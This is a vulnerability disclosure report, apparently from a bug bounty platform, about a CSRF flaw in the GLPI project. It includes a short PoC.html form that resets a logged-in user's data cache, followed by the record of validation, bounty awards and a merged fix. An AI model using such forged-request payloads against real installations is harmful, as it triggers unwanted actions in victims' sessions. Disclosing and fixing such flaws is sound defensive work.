Cross-Site Request Forgery (CSRF) in glpi-project/glpi


Reported on

Sep 10th 2021

✍️ Description

Hello dear glpi team I found one more CSRF vulnerability in following directory:


🕵️‍♂️ Proof of Concept

1.fisrt user already should be logged in In Firefox or safari.

2.Open the PoC.html and click on submit button ( Also it can be auto-submit)

3.Here User data cache will be reset after clicking on submit button on PoC.html file.

// PoC.html

  <script>history.pushState('', '', '/')</script>
    <form action="">
      <input type="hidden" name="reset&#95;cache" value="1" />
      <input type="hidden" name="optname" value="cache&#95;db" />
      <input type="submit" value="Submit request" />
We have contacted a member of the glpi-project/glpi team and are waiting to hear back 10 months ago
glpi-project/glpi maintainer validated this vulnerability 10 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
François Legastelois confirmed that a fix has been merged on 93750e a month ago
François Legastelois has been awarded the fix bounty
to join this conversation